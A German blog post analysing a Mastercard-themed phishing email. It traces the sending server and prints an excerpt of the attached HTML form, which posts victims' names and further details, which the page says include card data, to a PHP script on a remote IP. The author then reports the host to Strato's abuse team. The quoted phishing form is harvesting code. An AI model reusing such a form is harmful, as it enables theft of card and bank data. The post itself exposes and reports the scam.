Vorgestern erreichte mich eine Phishing E-Mail, die von Mozilla Thunderbird sofort und richtig als eine solche erkannt wurde:
Die Phishing E-Mail
“Die Grammatik ist gar nicht mal so übel für eine Phishingmail”, habe ich mich gedacht und mir die Nachricht mal genauer angesehen. Im Header wird eine Mailadresse “info@mastercard.de” angezeigt.. sieht echt aus. Ein Blick in den Quellcode der E-Mail hat aber folgendes gezeigt:
Received: from s15443117.onlinehome-server.info (unknown [127.0.0.1]) by s15443117.onlinehome-server.info (Postfix) with ESMTP id 66D1241B801 for <leisterthomas@gmx.de>; Sun, 19 Jan 2014 19:07:50 +0000 (UTC)
Natürlich stammte die E-Mail nicht von Mastercard. Ich habe noch nicht einmal eine ;) Die E-Mail kommt in Wirklichkeit von einem Postfix Mailserver mit der Subdomain “s15443117.onlinehome-server.info“. Also habe ich mich mit einer Whois Abfrage mal schnell erkundigt, wem denn die Domain onlinehome-server.info gehört. Und siehe da: Die gehört 1&1, dem Internetprovider. Anscheinend bietet dieser einen DynDNS Service an, der unter dieser Domain läuft. Kunden können sich dann eine Subdomain registrieren und der Traffic wird an den Festnetzanschluss weitergeleitet. Warum das alles? Ganz einfach: Hier betreibt jemand einen Mailserver Zuhause, der die ganzen Phishingmails verschickt. Zuhause, weil sich der Betrüger in dem Fall keine eigenen Domain mit seinen persönlichen Daten (=> DNS Record) beschaffen muss, sondern gegenüber der Öffentlichkeit anonym bleibt. Wäre das also geklärt. Jemand betreibt privat einen kleinen Mailserver, mit dem er die Phishingmails in das weite Internet schickt.
Als nächstes habe ich mir den Mailanhang angesehen. Im Anhang befand sich eine HTML Datei “formular.html”, die der Nutzer in seinem Browser öffnen sollte. Das habe ich einfach mal getan und folgende Seite hat sich geöffnet:
Nettes Detail: Sogar den Punkt “Phishing-E-Mails” im Menü links hat der Betrüger beibehalten ;)
Auf der Seite wird man aufgefordert, sämtliche persönliche Daten anzugeben und die nötigen Kreditkarteninformationen sowie die Kontonummer.
Aber wohin werden diese Daten denn geschickt, wenn ich auf “Bestätigen” klicke? Ein Blick in den Quelltext zeigt:
<form action="http://81.169.140.198/favicon.php" method="post"> <p>Vorname:<br><input name="vorname" type="text" size="24" maxlength="50"></p> <p>Nachname:<br><input name="nachname" type="text" size="24" maxlength="50"></p> [...] <input type="image" src="https://www.targobank.de/de/images/std/valider.gif" alt="Absenden"> </form>
… die Daten werden an einen weiteren Server mit der IP 81.169.140.198 versendet. Dort werden sie von einem PHP Script “favicon.php” (Einfallsreicher Tarnname ;) ) entgegengenommen und in einer Datenbank abgelegt. Der Benutzer wird auf die Mastercard Startseite für Privatkunden (http://www.mastercard.com/de/privatkunden/index.html) weitergeleitet.
Nach weiterer Codeanalyse habe ich festgestellt, dass ein Großteil des Sourcecodes von einer echten Mastercard Website kopiert wurde… und zwar von dieser: http://www.mastercard.com/chd/personal/de/cardholderservices/phishing.html
Den Code hat der Betrüger einfach von der Mastercard Website der Schweiz übernommen
Eine gewisse Ähnlichkeit lässt sich nicht abstreiten, und sogar Humor hat der Betrüger bewiesen: Er hat ausgerechnet die Seite als Vorlage gewählt, die vor Phishing E-Mails warnt. Wer genau hinsieht, wird auch feststellen, dass in der Phishing-Mail ebenfalls der Menüpunkt “Phishing-E-Mails” angewählt ist.
Was hat der Betrüger gemacht? Einfach eine Mastercard Seite genommen, den Code kopiert, den Inhalt geändert und ein Formular eingebunden, das die eingegebenen Daten an einen bestimmten Server schickt.
Die IP des Phishingservers hätten wir also. Jetzt fehlen noch genauere Infos zum Server – ich hatte aber nur die IP. Die Lösung: Reverse DNS. Im Gegensatz zum normalen DNS System ordnet das Reverse DNS einer IP Adresse einen oder mehrere Hostnames zu. Whois.net bietet einen solchen Service an. IP Adresse eingeben und hoffen, dass ein Hostname zurückkommt. Und tatsächlich: Der IP ist ein Hostname zugeordnet und zwar: h1819164.stratoserver.net
Wenn das mal nicht nach einem Rootserver bei Strato riecht… ;)
Meinen Plan, die Datenbank des Betrügers über zahlreiche POST Requests mit wüsten Beschimpfungen vollzuspammen, habe ich in dem Moment verworfen und mich daran gemacht, Strato über die Geschehnisse zu informieren. Beweise hatte ich gesichert: Screenshots, E-Mail und den Anhang. Auf meiner Suche nach einer geeigneten Kontaktmöglichkeit zu Strato bin ich schließlich auf das Onlineformular gestoßen. War nicht ganz geeignet für diesen Zweck, aber letztendlich hat meine Nachricht doch noch den Support erreicht. Gestern habe ich eine Mail bekommen mit der Nachricht, man würde meine Meldung an die Rechtsabteilung von Strato weiterleiten. Die haben mich heute nochmal angeschrieben und zugesagt, den Fall zu bearbeiten:
Sehr geehrter Herr Leister,
wir haben Ihre Nachricht erhalten und mit der Bearbeitung des von Ihnen beschriebenen Vorgangs begonnen.
Bitte haben Sie Verständnis dafür, dass wir Ihnen aus datenschutzrechtlichen Gründen keine weiteren Informationen geben können.
Sollten Sie uns einen neuen Abuse-Vorgang melden wollen, bitten wir Sie, hierfür eine neue E-Mail an (abuse-server@strato.de) zu schreiben.Wir bedanken uns für Ihre Meldung und wünschen Ihnen noch einen schönen Tag.
Mit freundlichen Grüßen
STRATO AG | CCS Abuse
Na dann… war’s das wohl. Ich hoffe, die Leute von Strato gehen der Sache möglichst schnell nach – nicht dass doch noch jemand auf die Phishingmail reinfällt. GMX hatte sie ja nicht als Betrugsversuch erkannt. Um den GMX Bot zu trainieren, habe ich die Mail als Spam-Mail markiert.
Bleibt mir zu sagen: Falls nicht auf dem Mist rein.